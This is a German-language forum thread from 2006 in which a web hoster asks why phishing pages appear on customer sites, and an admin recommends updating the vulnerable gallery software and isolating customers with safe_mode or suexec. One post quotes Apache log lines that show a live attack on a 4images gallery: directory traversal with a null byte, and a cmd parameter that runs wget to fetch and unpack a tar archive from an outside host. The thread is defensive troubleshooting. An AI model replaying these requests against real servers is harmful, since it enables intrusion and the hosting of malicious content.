Apache Sicherheit -> Phishing Seiten

Post Reply
Message
Author
vayia
Posts: 4
Joined: 01. Sep 2006 14:16
Location: Winterthur
Contact:

Apache Sicherheit -> Phishing Seiten

#1 Post by vayia »

Hallo zusammen,

Ich hab ne Frage zum Apache Server.

Jede virtuelle Domain hat einen eigenen Benutzer und eine eigene Gruppe,
dieser hat auch Schreibrechte, ab und zu taucht nun eine Phishingseite auf diesen Seiten auf, die wohl per HTTP Post raufgeladen wurden.

Die Rechte brauchts leider für die ver. CMS die von den Kunden installiert werden.
Hat da jemand ne Idee?

Gruss Pascal

klopskuchen
prolinux-forum-admin
Posts: 1444
Joined: 26. Jun 2004 21:18
Contact:

#2 Post by klopskuchen »

die wohl per HTTP Post raufgeladen wurden.
Meinst du nicht 'PUT'?
Wenn doch 'POST', werden die übermittelten Daten unreichend validiert. Zeig mal ein paar Einträge solcher uploads aus der access.conf.

MfG, Klopskuchen
When all else fails, read the instructions .

vayia
Posts: 4
Joined: 01. Sep 2006 14:16
Location: Winterthur
Contact:

#3 Post by vayia »

So was:
81.24.26.57 - - [31/Aug/2006:23:52:00 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=wget%20-o%20../ama.tar%20nusunteu.xhost.ro/am
a.tar;ls%20../ama.tar HTTP/1.1" 200 644 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:27 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=cd%20..;tar%20xvf%20ama.tar HTTP/1.1" 200 633
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:37 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=ls%20ama.tar HTTP/1.1" 200 641 "-" "Mozilla/5
.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:43 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=tar%20xvf%20ama.tar HTTP/1.1" 200 1622 "-" "M
ozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
ich denke das liegt wohl am cms von diesem kunden?

edit:: ist wohl so ein php gallery tool...

klopskuchen
prolinux-forum-admin
Posts: 1444
Joined: 26. Jun 2004 21:18
Contact:

#4 Post by klopskuchen »

../../[...]&cmd=wget...
- Ist das Ausführen beliebiger Kommandos vorgesehen?
- Ist das directory-traversal vorgesehen? (Hast du rumänische Kunden? :) )
- Was ist das für Software?


MfG, Klopskuchen
When all else fails, read the instructions .

vayia
Posts: 4
Joined: 01. Sep 2006 14:16
Location: Winterthur
Contact:

#5 Post by vayia »

Hallo,

Ich denke das ist ne Sicherheitslücke,

http://www.4homepages.de/forum/index.php?topic=11855.0

muss ich wohl updaten. Aber ist halt schwierig. Ich kann ja nicht alle Kundendomains überwachen... Und die können installieren was Sie wollen....

Wie handhabt ihr das so?

klopskuchen
prolinux-forum-admin
Posts: 1444
Joined: 26. Jun 2004 21:18
Contact:

#6 Post by klopskuchen »

Und die können installieren was Sie wollen
Wenn eine Kunde kaputte Software fährt und sein Kram zerstört wird, hat er Pech gehabt. Du solltest Kunden voreinander schützen. Und deinen Server vorm Kunden. Solange jemand nur sein eigenes Verzeichnis zerschießt, naja wen juckts, daß ist sein Bier.


MfG, Klopskuchen
When all else fails, read the instructions .

vayia
Posts: 4
Joined: 01. Sep 2006 14:16
Location: Winterthur
Contact:

#7 Post by vayia »

Was kann man denn da überprüfen?

Meine Systeme sind Debian Sarge 3.1 und als Verwaltungstool setze ich VHCS ein.
Die System wurden nach VHCS HowTO's erstellt.

Dieser macht virtuelle Hosts in der Apachekonf. Mehr ist da aber glaubs nicht drin.
Kann man die einzelnen Seiten irgendwie von einander schützen?

Die Phishing-Dateien gehören dann der Gruppe www-data.
Jede Domain hat eigentlich eine Gruppe und einen Benutzer mit dem gleichem Namen,
aber der www-data hat da trotzdem Rechte (apache-user?).

Falls jemand n gutes Howto hat würd ich das gerne mal durchchecken.

Danke

klopskuchen
prolinux-forum-admin
Posts: 1444
Joined: 26. Jun 2004 21:18
Contact:

#8 Post by klopskuchen »

http://www.php-faq.de/q/q-konfiguration-safe-mode.html
Im Idealfall mod-cgi und su-exec. Ist allerdings etwas langsamer in der Ausführung, weshalb gerade Massenhoster mod-php bevorzugen um mehr Kunden auf eine Kiste klatschen zu können.


MfG, Klopskuchen
When all else fails, read the instructions .

Post Reply